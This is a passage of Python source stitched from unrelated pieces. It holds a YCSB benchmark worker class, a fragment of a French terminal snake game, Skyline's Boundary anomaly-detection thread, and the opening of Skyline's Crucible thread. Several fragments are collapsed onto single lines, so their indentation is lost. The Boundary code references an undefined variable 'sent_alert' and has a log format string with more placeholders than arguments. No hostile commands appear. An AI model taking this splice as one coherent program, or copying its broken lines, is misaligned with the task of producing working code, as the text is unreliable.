        ("[SCAN]", "95thPercentileLatency(us)"): 'SCAN_95',
    }

    def __init__(self, access_settings, remote, test, ycsb):
        """
        :param access_settings: provides ``workers`` (number of processes)
            and ``time``
        :param remote: object whose ``ycsb_load_run`` executes the workload
        :param test: object whose ``create_load_cmd`` builds the command line
        :param ycsb: provides ``path``, ``log_path`` and ``log_file``
        """
        self.workers = access_settings.workers
        self.remote = remote
        self.test = test
        self.timer = access_settings.time
        self.ycsb = ycsb
        self.shutdown_event = Event() if self.timer else None
        # The proxies keep their manager alive, so it is deliberately not
        # stored on the instance.
        manager = Manager()
        self.ycsb_result = manager.dict({key: [] for key in ['Throughput',
                                                             'READ_95',
                                                             'UPDATE_95',
                                                             'INSERT_95',
                                                             'SCAN_95']})
        self.ycsb_logfiles = manager.list()
        # Serialises the read-modify-write updates of ycsb_result that the
        # parallel parse processes perform.
        self._result_lock = manager.Lock()
        self.task = self.ycsb_work

    def time_to_stop(self):
        """Return True when a shutdown event exists and has been set."""
        return (self.shutdown_event is not None and
                self.shutdown_event.is_set())

    def ycsb_work(self, mypid):
        """
        Run the workload once for worker ``mypid`` and record the name of the
        file its results are exported to.

        :raises YCSBException: when the run fails
        """
        log_file = '{}_{}.txt'.format(self.ycsb.log_path + self.ycsb.log_file, str(mypid))
        self.ycsb_logfiles.append(log_file)
        self.run_cmd = self.test.create_load_cmd(action="run", mypid=mypid)
        self.run_cmd += ' -p exportfile={}'.format(log_file)
        try:
            if not self.time_to_stop():
                self.remote.ycsb_load_run(self.ycsb.path,
                                          self.run_cmd,
                                          log_path=self.ycsb.log_path,
                                          mypid=mypid)
        except Exception as e:
            # Format the cause into the message; concatenating the exception
            # object itself raises TypeError and hides the real failure.
            raise YCSBException(' Error while running YCSB load: {}'.format(e))

    def pattern(self, line):
        """
        Collect the value of one ``section, measurement, value`` export line
        when it is one of the tracked measurements.

        Lines that do not have exactly three comma separated fields, and
        measurements that are not tracked, are ignored.
        """
        fields = [field.strip() for field in line.split(',')]
        if len(fields) != 3:
            return
        ttype, measure, value = fields

        key = self._RESULT_KEYS.get((ttype, measure))
        if key is None:
            return

        # ``+=`` on the proxy is a fetch followed by a store; without the
        # lock two processes can overwrite each other's update.
        with self._result_lock:
            self.ycsb_result[key] += [round(float(value))]

    def parse_work(self, mypid):
        """Feed every line of the ``mypid``-th recorded log file to pattern()."""
        filename = self.ycsb_logfiles[mypid]
        with open(filename, "r") as txt:
            for line in txt:
                self.pattern(line)

    def run(self):
        """
        Run ``self.task`` in ``self.workers`` processes, passing each its
        index, and wait for all of them to finish.
        """
        processes = [Process(target=self.task, args=(x,)) for x in range(self.workers)]
        for p in processes:
            p.start()

        for p in processes:
            p.join()
            if p.exitcode:
                logger.interrupt('Worker finished with non-zero exit code')

    def parse(self):
        """
        Parse the recorded log files in parallel.

        :return: tuple of (sum of throughputs, mean READ_95, mean UPDATE_95,
            mean INSERT_95, mean SCAN_95)
        """
        self.task = self.parse_work
        self.run()
        return np.sum(self.ycsb_result['Throughput']), \
            np.mean(self.ycsb_result['READ_95']), \
            np.mean(self.ycsb_result['UPDATE_95']), \
            np.mean(self.ycsb_result['INSERT_95']), \
            np.mean(self.ycsb_result['SCAN_95'])
print() system('setterm -cursor on') # Réafficher le curseur si on fait CTRL+C exit(0) snake_list = [] snake_direction = Manager().Value('ctypes.c_char_p', "right") ## Variable partagée avec l'autre processus snake_blocks = Manager().Value('i', 2) game_speed = Manager().Value('f', .5) posLargSnake = Manager().Value('i', 1) posLongSnake = Manager().Value('i', 1) snake_head = Manager().list() snake_head.append(1) snake_head.append(2) point_pos = Manager().list() score = Manager().Value('i', 0) game_over = Manager().Value('b', False) pause = Manager().Value('b', False) printed_pause = Manager().Value('b', True) touche = Manager().Value('i', 0) colored_space = Manager().Value('ctypes.c_char_p', colored(' ', 'grey', 'on_grey')) colored_snake_body = Manager().Value('ctypes.c_char_p', colored('x', 'green', 'on_green')) colored_snake_head = Manager().Value('ctypes.c_char_p', colored('x', 'white', 'on_white')) colored_point = Manager().Value('ctypes.c_char_p', colored('o', 'red', 'on_red')) signal.signal(signal.SIGINT, quit)
class Boundary(Thread): def __init__(self, parent_pid): """ Initialize the Boundary """ super(Boundary, self).__init__() self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.boundary_metrics = Manager().list() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def send_graphite_metric(self, name, value): if settings.GRAPHITE_HOST != '': sock = socket.socket() try: sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT)) except socket.error: endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT) logger.error('Cannot connect to Graphite at %s' % endpoint) return False sock.sendall('%s %s %i\n' % (name, value, time())) sock.close() return True return False def unique_noHash(self, seq): seen = set() return [x for x in seq if str(x) not in seen and not seen.add(str(x))] # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True # for dumping the metric timeseries data into for debugging purposes def mkdir_p(self, path): try: os.makedirs(path) return True except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def spin_process(self, i, boundary_metrics): """ Assign a bunch of metrics for a process to analyze. 
""" # Determine assigned metrics bp = settings.BOUNDARY_PROCESSES bm_range = len(boundary_metrics) keys_per_processor = int(ceil(float(bm_range) / float(bp))) if i == settings.BOUNDARY_PROCESSES: assigned_max = len(boundary_metrics) else: # This is a skyine bug, the original skyline code uses 1 as the # beginning position of the index, python indices begin with 0 # assigned_max = len(boundary_metrics) # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014 # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment assigned_max = min(len(boundary_metrics), i * keys_per_processor) assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys] if ENABLE_BOUNDARY_DEBUG: logger.info('debug - printing assigned_metrics_and_algos') for assigned_metric_and_algo in assigned_metrics_and_algos: logger.info('debug - assigned_metric_and_algo - %s' % str(assigned_metric_and_algo)) # Compile assigned metrics assigned_metrics = [] for i in assigned_metrics_and_algos: assigned_metrics.append(i[0]) # unique unhashed things def unique_noHash(seq): seen = set() return [x for x in seq if str(x) not in seen and not seen.add(str(x))] unique_assigned_metrics = unique_noHash(assigned_metrics) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unique_assigned_metrics - %s' % str(unique_assigned_metrics)) logger.info('debug - printing unique_assigned_metrics:') for unique_assigned_metric in unique_assigned_metrics: logger.info('debug - unique_assigned_metric - %s' % str(unique_assigned_metric)) # Check if this process is unnecessary if len(unique_assigned_metrics) == 0: return # Multi get series try: raw_assigned = self.redis_conn.mget(unique_assigned_metrics) except: logger.error("failed to mget assigned_metrics from redis") return # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = 
defaultdict(int) # Reset boundary_algortims all_boundary_algorithms = [] for metric in BOUNDARY_METRICS: all_boundary_algorithms.append(metric[1]) # The unique algorithms that are being used boundary_algorithms = unique_noHash(all_boundary_algorithms) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - boundary_algorithms - %s' % str(boundary_algorithms)) discover_run_metrics = [] # Distill metrics into a run list for i, metric_name, in enumerate(unique_assigned_metrics): self.check_if_parent_is_alive() try: if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(i))) raw_series = raw_assigned[i] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) except Exception as e: exceptions['Other'] += 1 logger.error("redis data error: " + traceback.format_exc()) logger.error("error: %e" % e) base_name = metric_name.replace(FULL_NAMESPACE, '', 1) # Determine the metrics BOUNDARY_METRICS metric tuple settings for metrick in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metrick[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) metric_pattern_matched = False if pattern_match: metric_pattern_matched = True algo_pattern_matched = False for algo in boundary_algorithms: for metric in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metric[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1])) metric_expiration_time = False metric_min_average = False metric_min_average_seconds = False metric_trigger = False algorithm = False algo_pattern_matched = True algorithm = metric[1] try: if metric[2]: metric_expiration_time = metric[2] except: metric_expiration_time = False try: if metric[3]: metric_min_average = metric[3] except: metric_min_average = False 
try: if metric[4]: metric_min_average_seconds = metric[4] except: metric_min_average_seconds = 1200 try: if metric[5]: metric_trigger = metric[5] except: metric_trigger = False try: if metric[6]: alert_threshold = metric[6] except: alert_threshold = False try: if metric[7]: metric_alerters = metric[7] except: metric_alerters = False if metric_pattern_matched and algo_pattern_matched: if ENABLE_BOUNDARY_DEBUG: logger.info('debug - added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm)) discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - printing discover_run_metrics') for discover_run_metric in discover_run_metrics: logger.info('debug - discover_run_metrics - %s' % str(discover_run_metric)) logger.info('debug - build unique boundary metrics to analyze') # Determine the unique set of metrics to run run_metrics = unique_noHash(discover_run_metrics) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - printing run_metrics') for run_metric in run_metrics: logger.info('debug - run_metrics - %s' % str(run_metric)) # Distill timeseries strings and submit to run_selected_algorithm for metric_and_algo in run_metrics: self.check_if_parent_is_alive() try: raw_assigned_id = metric_and_algo[0] metric_name = metric_and_algo[1] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) metric_expiration_time = metric_and_algo[2] metric_min_average = metric_and_algo[3] metric_min_average_seconds = metric_and_algo[4] metric_trigger = metric_and_algo[5] alert_threshold = metric_and_algo[6] metric_alerters = metric_and_algo[7] algorithm = metric_and_algo[8] if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unpacking timeseries for %s - %s' % 
(metric_name, str(raw_assigned_id))) raw_series = raw_assigned[metric_and_algo[0]] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id))) autoaggregate = False autoaggregate_value = 0 # Determine if the namespace is to be aggregated if BOUNDARY_AUTOAGGRERATION: for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS: autoaggregate = False autoaggregate_value = 0 CHECK_MATCH_PATTERN = autoaggregate_metric[0] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: autoaggregate = True autoaggregate_value = autoaggregate_metric[1] if ENABLE_BOUNDARY_DEBUG: logger.info('debug - BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate))) if ENABLE_BOUNDARY_DEBUG: logger.info( 'debug - analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % ( metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, autoaggregate, autoaggregate_value, algorithm) ) # Dump the the timeseries data to a file timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm self.mkdir_p(timeseries_dump_dir) timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json" with open(timeseries_dump_file, 'w+') as f: f.write(str(timeseries)) f.close() # Check if a metric has its own unique BOUNDARY_METRICS alert # tuple, this allows us to paint an entire metric namespace with # the same brush AND paint a unique metric or namespace with a # different brush or scapel has_unique_tuple = False run_tupple = False boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters) wildcard_namespace = True for 
metric_tuple in BOUNDARY_METRICS: if not has_unique_tuple: CHECK_MATCH_PATTERN = metric_tuple[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: if metric_tuple[0] == base_name: wildcard_namespace = False if not has_unique_tuple: if boundary_metric_tuple == metric_tuple: has_unique_tuple = True run_tupple = True if ENABLE_BOUNDARY_DEBUG: logger.info('unique_tuple:') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) logger.info('metric_tuple: %s' % str(metric_tuple)) if not has_unique_tuple: if wildcard_namespace: if ENABLE_BOUNDARY_DEBUG: logger.info('wildcard_namespace:') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) run_tupple = True else: if ENABLE_BOUNDARY_DEBUG: logger.info('wildcard_namespace: BUT WOULD NOT RUN') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) if ENABLE_BOUNDARY_DEBUG: logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple) if run_tupple: # Submit the timeseries and settings to run_selected_algorithm anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm( timeseries, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, autoaggregate, autoaggregate_value, algorithm ) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - analysed - %s' % (metric_name)) else: anomalous = False if ENABLE_BOUNDARY_DEBUG: logger.info('debug - more unique metric tuple not analysed - %s' % (metric_name)) # If it's anomalous, add it to list if anomalous: anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm] self.anomalous_metrics.append(anomalous_metric) # Get the anomaly 
breakdown - who returned True? for index, value in enumerate(ensemble): if value: anomaly_breakdown[algorithm] += 1 # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info("exceptions['Other'] traceback follows:") logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) def run(self): """ Called when the process intializes. """ while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Reset boundary_metrics boundary_metrics = [] # Build boundary metrics for metric_name in unique_metrics: for metric in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metric[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) base_name = metric_name.replace(FULL_NAMESPACE, '', 1) pattern_match = check_match_pattern.match(base_name) if pattern_match: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - boundary metric - pattern MATCHED - " + metric[0] + " | " + base_name) boundary_metrics.append([metric_name, metric[1]]) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - boundary metrics - " + str(boundary_metrics)) if len(boundary_metrics) == 0: logger.info('no metrics in redis. 
try adding some - see README') sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.BOUNDARY_PROCESSES + 1): if i > len(boundary_metrics): logger.info('WARNING: skyline boundary is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, boundary_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Send alerts if settings.BOUNDARY_ENABLE_ALERTS: for anomalous_metric in self.anomalous_metrics: datapoint = str(anomalous_metric[0]) metric_name = anomalous_metric[1] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) expiration_time = str(anomalous_metric[2]) metric_trigger = str(anomalous_metric[5]) alert_threshold = int(anomalous_metric[6]) metric_alerters = anomalous_metric[7] algorithm = anomalous_metric[8] if ENABLE_BOUNDARY_DEBUG: logger.info("debug - anomalous_metric - " + str(anomalous_metric)) # Determine how many times has the anomaly been seen if the # ALERT_THRESHOLD is set to > 1 and create a cache key in # redis to keep count so that alert_threshold can be honored if alert_threshold == 0: times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alert_threshold - " + str(alert_threshold)) if alert_threshold == 1: times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alert_threshold - " + str(alert_threshold)) if alert_threshold > 1: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alert_threshold - " + str(alert_threshold)) anomaly_cache_key_count_set = False anomaly_cache_key_expiration_time = 
(int(alert_threshold) + 1) * 60 anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name) try: anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key) if not anomaly_cache_key_count: try: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis no anomaly_cache_key - " + str(anomaly_cache_key)) times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis setex anomaly_cache_key - " + str(anomaly_cache_key)) self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen))) logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen))) except Exception as e: logger.error('redis setex failed :: %s' % str(anomaly_cache_key)) logger.error("couldn't set key: %s" % e) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis anomaly_cache_key retrieved OK - " + str(anomaly_cache_key)) anomaly_cache_key_count_set = True except: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis failed - anomaly_cache_key retrieval failed - " + str(anomaly_cache_key)) anomaly_cache_key_count_set = False if anomaly_cache_key_count_set: unpacker = Unpacker(use_list=False) unpacker.feed(anomaly_cache_key_count) raw_times_seen = list(unpacker) times_seen = int(raw_times_seen[0]) + 1 try: self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen))) logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen))) except: times_seen = 1 logger.error('set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen))) # Alert the alerters if times_seen > alert_threshold if times_seen >= alert_threshold: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - times_seen %s is greater than or equal to alert_threshold %s" % (str(times_seen), str(alert_threshold))) for alerter in metric_alerters.split("|"): # Determine alerter limits send_alert = False alerts_sent = 0 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - checking alerter - %s" % alerter) try: 
if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determining alerter_expiration_time for settings") alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter] alerter_expiration_time = int(alerter_expiration_time_setting) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determined alerter_expiration_time from settings - %s" % str(alerter_expiration_time)) except: # Set an arbitrary expiry time if not set alerter_expiration_time = 160 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - could not determine alerter_expiration_time from settings") try: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determining alerter_limit from settings") alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter] alerter_limit = int(alerter_limit_setting) alerter_limit_set = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determined alerter_limit from settings - %s" % str(alerter_limit)) except: alerter_limit_set = False send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - could not determine alerter_limit from settings") # If the alerter_limit is set determine how many # alerts the alerter has sent if alerter_limit_set: alerter_sent_count_key = 'alerts_sent.%s' % (alerter) try: alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key) if not alerter_sent_count_key_data: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key)) alerts_sent = 0 send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerts_sent set to %s" % str(alerts_sent)) logger.info("debug - send_alert set to %s" % str(sent_alert)) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis alerter key retrieved, unpacking" + str(alerter_sent_count_key)) unpacker = Unpacker(use_list=False) unpacker.feed(alerter_sent_count_key_data) raw_alerts_sent = list(unpacker) alerts_sent = int(raw_alerts_sent[0]) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerter %s 
alerts sent %s " % (str(alerter), str(alerts_sent))) except: logger.info("No key set - %s" % alerter_sent_count_key) alerts_sent = 0 send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerts_sent set to %s" % str(alerts_sent)) logger.info("debug - send_alert set to %s" % str(send_alert)) if alerts_sent < alerter_limit: send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit))) logger.info("debug - send_alert set to %s" % str(send_alert)) # Send alert alerter_alert_sent = False if send_alert: cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - checking cache_key - %s" % cache_key) try: last_alert = self.redis_conn.get(cache_key) if not last_alert: try: self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0]))) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - key setex OK - %s' % (cache_key)) trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) alerter_alert_sent = True except Exception as e: logger.error('alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm)) logger.error("couldn't send alert: %s" % str(e)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) 
except: trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) else: trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) # Update the alerts sent for the alerter cache key, # to allow for alert limiting if alerter_alert_sent and alerter_limit_set: try: alerter_sent_count_key = 'alerts_sent.%s' % (alerter) new_alerts_sent = int(alerts_sent) + 1 self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent))) logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent))) except: logger.error('failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent))) else: # Always alert to syslog, even if alert_threshold is not # breached or if send_alert is not True trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) # Write anomalous_metrics to static webapp directory if len(self.anomalous_metrics) > 0: filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(boundary_metrics)) logger.info('total analyzed :: %d' % (len(boundary_metrics) - sum(exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite 
self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'run_time', '%.2f' % (time() - now)) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_analyzed', '%.2f' % (len(boundary_metrics) - sum(exceptions.values()))) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_anomalies', '%d' % len(self.anomalous_metrics)) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_metrics', '%d' % len(boundary_metrics)) for key, value in exceptions.items(): send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'exceptions.%s' % key self.send_graphite_metric(send_metric, '%d' % value) for key, value in anomaly_breakdown.items(): send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'anomaly_breakdown.%s' % key self.send_graphite_metric(send_metric, '%d' % value) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'duration', '%.2f' % time_human) self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'projected', '%.2f' % projected) # Reset counters self.anomalous_metrics[:] = [] # Only run once per minute seconds_to_run = int((time() - now)) if seconds_to_run < 60: sleep_for_seconds = 60 - seconds_to_run else: sleep_for_seconds = 0 if sleep_for_seconds > 0: logger.info('sleeping for %s seconds' % sleep_for_seconds) sleep(sleep_for_seconds)
class Crucible(Thread): def __init__(self, parent_pid): """ Initialize Crucible """ super(Crucible, self).__init__() self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.process_list = Manager().list() self.metric_variables = Manager().list() self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) def check_if_parent_is_alive(self): """ Check if the parent process is alive """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def spin_process(self, i, run_timestamp, metric_check_file): """ Assign a metric for a process to analyze. :param i: python process id :param run_timestamp: the epoch timestamp at which this process was called :param metric_check_file: full path to the metric check file :return: returns True """ child_process_pid = os.getpid() if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('child_process_pid - %s' % str(child_process_pid)) self.process_list.append(child_process_pid) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('processing metric check - %s' % metric_check_file) if not os.path.isfile(str(metric_check_file)): logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file))) return check_file_name = os.path.basename(str(metric_check_file)) if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_name - %s' % check_file_name) check_file_timestamp = check_file_name.split('.', 1)[0] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_timestamp - %s' % str(check_file_timestamp)) check_file_metricname_txt = check_file_name.split('.', 1)[1] if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_metricname_txt - %s' % check_file_metricname_txt) check_file_metricname = check_file_metricname_txt.replace('.txt', '') if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('check_file_metricname - %s' % check_file_metricname) check_file_metricname_dir = check_file_metricname.replace('.', '/') if settings.ENABLE_CRUCIBLE_DEBUG: 
logger.info('check_file_metricname_dir - %s' % check_file_metricname_dir) metric_failed_check_dir = failed_checks_dir + '/' + check_file_metricname_dir + '/' + check_file_timestamp if settings.ENABLE_CRUCIBLE_DEBUG: logger.info('metric_failed_check_dir - %s' % metric_failed_check_dir) # failed_check_file = failed_checks_dir + '/' + check_file_name failed_check_file = metric_failed_check_dir + '/' + check_file_name # Load and validate metric variables try: metric_vars = load_metric_vars(skyline_app, str(metric_check_file)) except: logger.error('error :: failed to import metric variables from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) # TBD - a failed check Panorama update will go here, perhaps txt # files are not the only "queue" that will be used, both, but # Panorama, may be just a part of Skyline Flux, the flux DB # would allow for a very nice, distributed "queue" and a # distributed Skyline workforce... # Any Skyline node could just have one role, e.g. lots of # Skyline nodes running crucible only and instead of reading # the local filesystem for input, they could read the Flux DB # queue or both... return # Test metric variables # We use a pythonic methodology to test if the variables are defined, # this ensures that if any of the variables are not set for some reason # we can handle unexpected data or situations gracefully and try and # ensure that the process does not hang. 
